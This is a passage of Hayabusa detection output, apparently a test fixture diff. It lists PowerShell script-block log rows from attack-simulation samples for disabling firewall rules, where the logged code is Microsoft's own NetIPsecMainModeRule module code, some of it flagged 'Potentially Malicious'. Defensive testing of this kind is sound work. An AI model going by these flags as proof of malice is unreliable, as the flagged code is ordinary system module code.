[OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetMainModeRule')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled[]] ${Enabled}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${MainModeCryptoSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Phase1AuthSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetAddressFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallAddressFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallProfile')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallProfile}, [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP1AuthSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecPhase1AuthSet}, [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEMMCryptoSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecMainModeCryptoSet}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetMainModeRule')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Enabled') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Enabled}) $__cmdletization_queryBuilder.FilterByProperty('Enabled', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('MainModeCryptoSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${MainModeCryptoSet}) $__cmdletization_queryBuilder.FilterByProperty('MainModeCryptoSet', $__cmdletiza",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx
+2021-04-23 19:09:44.864 +09:00,srvdefender01.offsec.lan,4104,info,,PwSh Scriptblock Log,"splayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll', 'InputObject (cdxml)') -contains $_ } { $__cmdletization_returnValue = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('Enable', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecMainModeRule.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Enable-NetIPsecMainModeRule' -Alias '*' function Disable-NetIPsecMainModeRule { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetMainModeRule')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled[]] ${Enabled}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${MainModeCryptoSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Phase1AuthSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetAddressFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallAddressFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallProfile')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallProfile}, [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP1AuthSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecPhase1AuthSet}, [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEMMCryptoSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecMainModeCryptoSet}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetMainModeRule')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Enabled') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Enabled}) $__cmdletization_queryBuilder.FilterByProperty('Enabled', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('MainModeCryptoSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${MainModeCryptoSet}) $__cmdletization_queryBuilder.FilterByProperty('MainModeCryptoSet', $__cmdletiza",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx
+2021-04-23 19:09:44.864 +09:00,srvdefender01.offsec.lan,4104,medium,,Potentially Malicious PwSh,"tion_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Phase1AuthSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Phase1AuthSet}) $__cmdletization_queryBuilder.FilterByProperty('Phase1AuthSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallAddressFilter') -and (@('ByAssociatedNetFirewallAddressFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallAddressFilter}, 'MSFT_NetMainModeRuleFilterByAddress', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallProfile') -and (@('ByAssociatedNetFirewallProfile') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallProfile}, 'MSFT_NetMainModeRuleInProfile', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecPhase1AuthSet') -and (@('ByAssociatedNetIPsecPhase1AuthSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecPhase1AuthSet}, 'MSFT_NetMainModeRuleMMAuthSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecMainModeCryptoSet') -and (@('ByAssociatedNetIPsecMainModeCryptoSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecMainModeCryptoSet}, 'MSFT_NetMainModeRuleMMCryptoSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll', 'InputObject (cdxml)') -contains $_ } { $__cmdletization_returnValue = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('Disable', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecMainModeRule.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Disable-NetIPsecMainModeRule' -Alias '*'",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx
+2021-04-23 19:09:44.864 +09:00,srvdefender01.offsec.lan,4104,info,,PwSh Scriptblock Log,"tion_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Phase1AuthSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Phase1AuthSet}) $__cmdletization_queryBuilder.FilterByProperty('Phase1AuthSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if 